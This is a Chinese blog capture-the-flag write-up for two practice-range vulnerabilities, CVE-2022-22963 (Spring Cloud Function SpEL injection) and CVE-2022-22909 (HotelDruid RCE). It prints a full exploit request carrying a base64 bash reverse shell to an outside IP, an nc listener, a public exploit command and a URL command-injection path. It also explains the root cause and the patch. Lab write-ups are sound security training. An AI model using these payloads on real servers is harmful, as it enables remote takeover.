【春秋云境】CVE-2022-22963靶场WP和CVE-2022-22909靶场WP

最新推荐文章于 2025-04-20 10:45:30 发布
最新推荐文章于 2025-04-20 10:45:30 发布
阅读量1.7k 收藏 3
点赞数
分类专栏: 春秋云镜 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_46029520/article/details/128208529
版权

【春秋云境】CVE-2022-22963靶场WP

网站地址:https://yunjing.ichunqiu.com/

渗透测试

1.已知提示
  • SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 题目链接为:http://ip:port P.S 卡慢不影响拿flag
2.开启靶场

请添加图片描述

3.BP抓包

  • 访问路径/functionRouter ,并使用BP抓取请求包,并对其进行修改

  • 修改请求方式为POST,请求体为test。中间添加内容类型为Content-Type: text/plain,并添加恶意代码

    spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAuNDguOTYuMTAwLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}")

    其中YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAuNDguOTYuMTAwLzEyMzQgMD4mMQ==为base64编码后的结果,原式为bash -i >& /dev/tcp/ip/port 0>&1

  • 整体如下

    POST /functionRouter HTTP/1.1
Host: 47.95.3.91:36363
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAuNDguOTYuMTAwLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}")
Content-Type: text/plain
Accept-Language: zh-CN,zh;q=0.9
Cookie: COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1
Connection: close
Content-Length: 4

test

    请添加图片描述

4.反弹shell

  • 在自己的云服务器上监听1234端口(根据自己情况而定,记得修改防火墙规则)然后放行上面修改的请求包,反弹shell成功

    nc -lnvp 1234

    请添加图片描述

5.执行命令

  • cat /flag从而获得flag

    请添加图片描述

6.漏洞原理

  • Spring Cloud function 主要功能:

    • 通过功能促进业务逻辑的实现
    • 将业务逻辑的开发生命周期与任何特定的运行时目标分离,以便相同的代码可以作为Web端点,流处理器或任务运行
    • 支持无服务器提供商之间的统一编程模型,以及独立运行(本地或PaaS)的能力
    • 在无服务器提供商上启用Spring Boot功能(自动配置,依赖注入,指标)

  • 代码分析

    • 漏洞主要位置在:spring-cloud-function-context-3.2.2.jar!\org\springframework\cloud\function\context\config\RoutingFunction.class

      请添加图片描述

    • 从这里获取到spring.cloud.function.routing-expression的值,然后执行functionFromExpression,在这里调用了this.evalContext

      请添加图片描述

    • evalContext的本质是实例化了StandardEvaluationContext,StandardEvaluationContext也是最典型的SpEL注入的关键字

      请添加图片描述

    • 漏洞原理倒是没有什么弯弯绕绕的,主要就是SpEL的利用

7.排查建议

  • 添加一个isViaHeader

    • 为true时:headerEvalContext = SimpleEvaluationContext
    • 为false时:evalContext = new StandardEvaluationContext

  • 官方已针对此漏洞发布修复补丁,请受影响的用户尽快修复。

    官方链接:https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f

【春秋云境】CVE-2022-22909靶场WP

网站地址:https://yunjing.ichunqiu.com/

渗透测试

1.已知提示
  • Hotel Druid RCE
2.开启靶场

请添加图片描述

3.下载工具

  • 工具下载地址

    https://github.com/0z09e/CVE-2022-22909

    请添加图片描述

4.使用工具

  • 应用程序没有身份验证,运用该–noauth标志不履行身份验证,使用以下命令

     python3 .\exploit.py -t http://eci-2ze4kesepfiijn8067br.cloudeci1.ichunqiu.com/ --noauth

    请添加图片描述

5.读取文件

  • 访问/dati/selectappartamenti.php?1=cat /flag

    请添加图片描述

成功获得flag

春秋Time-WP【一遍过】
weixin_63576152的博客
10-11 775
重置了很多次靶机,所以靶机ip变化请忽略。
春秋 CVE-2022-4230 夺旗
05-02
### 春秋 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
[春秋镜]CVE-2022-22909
niubi707的博客
11-28 1078
[春秋镜]CVE-2022-22909复现
vulhub靶场进行CVE-2021-44228漏洞复现
最新发布
2401_88228727的博客
04-20 400
春秋CVE-2022-22909
qq_22002773的博客
07-19 400
春秋CVE-2022-22909
春秋Initial WP
m0_62466350的博客
12-05 1748
Initial是一套难度为简单的靶场,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。1.菜刀在php7的环下不能用,这个可是踩了大坑了。菜刀连接PHP WebShell返回200错误 - 知乎 (zhihu.com)[外链图片转存中…(img-SvBaevSt-1701756474326)]1.菜刀在php7的环下不能用,这个可是踩了大坑了。菜刀连接PHP WebShell返回200错误 - 知乎 (zhihu.com)
春秋CVE-2022-23134靶场WPCVE-2022-22965靶场WP
果粒程
12-05 1425
春秋CVE-2022-23134靶场WPCVE-2022-22965靶场WP
CVE-2022-22909
07-29
- *1* *2* [【春秋CVE-2022-22963靶场WPCVE-2022-22909靶场WP](https://blog.youkuaiyun.com/weixin_46029520/article/details/128208529)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630",...
春秋CVE-2022-21661
09-04
- *1* *3* [【春秋CVE-2022-2073靶场WPCVE-2022-1014靶场WP](https://blog.youkuaiyun.com/weixin_46029520/article/details/128231197)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra...
i春秋CVE-2022-32991
08-12
- *1* *2* *3* [【春秋CVE-2022-32991靶场wp](https://blog.youkuaiyun.com/MONSTERinCAT/article/details/127261129)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip...
CVE-2022-22909 项目教程
gitblog_00853的博客
09-15 405
CVE-2022-22909 项目教程 CVE-2022-22909 项目地址: https://gitcode.com/gh_mirrors/cv/CVE-2022-22909 ...
【内网渗透】春秋镜Intitle WP
Sapphire037的博客
04-23 2809
第一次正式接触内网渗透的东西,写的很新手,也适合新手观看,有问题可以私信或评论,接下来会持续更新。
春秋Delegation-WP【一遍过】
weixin_63576152的博客
10-14 763
这个靶场打了出乎意料的久。1.外围打点总是有问题,一直不回显ok,最后靠复制大佬的命令才能正常弹shell;2.fscan在蚁剑的shell里不显示结果(frp也不显示结果,但是是运行了的),还好可以弹shell到vps上,vps上可以正常显示结果;3.植入木马部分,powershell修改注册表是无效的,cmd才有用;4.各种上传的工具需要用管理员权限打开才能正常使用,SharpHound需要用猕猴桃弹出的域用户终端才能正常使用。
春秋Certify-WP【一遍过】
weixin_63576152的博客
10-12 1156
这里有几个用户名被修改成*了 因为都是些个人的账号密码,再联系前面扫到的三个3389端口,尝试爆破172.22.9.26(域控CA域不大可能,172.22.9.26这个域内机器是最有可能的)开代理,先看172.22.9.47 文件服务器,刚好也开了445端口(TCP端口),直接可以连接。扫描可以看到一个solr,solr一般会有log4j漏洞,看到有log4j组件。再次远程连接172.22.9.26,成功,但是没有管理员权限,所以没什么用处。导出数据,编为字典user.txtpass.txt,爆破。
春秋CVE-2022-22733靶场WP
果粒程
12-07 1848
春秋CVE-2022-22733靶场WP
春秋Initial-WP(附带详细代理过程)
weixin_63576152的博客
10-01 1063
用Thinkphpgui查找漏洞(一开始因为工具版本问题,一直不能getshell,心疼我的小砂砾),得到木马网址密码。flag02在C://Users/Administrator/flag/flag02.txt中。fscan扫描172.22.1.0/24,结果默认保存在同目录下的result.txt中。利用frpproxifier代理,可以访问到172.22.1.18(frp代理过程。用crackmapexec去进行hash传递攻击,使得我们可以访问到DC上的文件。
【内网渗透】春秋镜 Tsclient WP
Sapphire037的博客
05-15 1511
mssql连接攻击、windows提权、令牌窃取、镜像劫持。
春秋 Spoofing WP
m0_62466350的博客
01-26 1868
Spoofing是一套难度为中等的靶场,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环核心认证机制的理解,以及掌握域环渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
CVE-2022-30887漏洞复现
weixin_45177807的博客
11-06 2483
CVE-2022-30887漏洞复现
春秋CVE-2022-29464
09-05
春秋CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用代码解释。引用提供了一个具体的漏洞利用脚本的地址。如果您想了解更多关于该漏洞的细节分析,可以参考引用中提到的文章。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [【春秋CVE-2022-29464](https://blog.youkuaiyun.com/m0_49025459/article/details/130400369)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [春秋靶场 WSO2文件上传漏洞(CVE-2022-29464)](https://blog.youkuaiyun.com/qq_52923396/article/details/131832217)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

果粒程1122

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值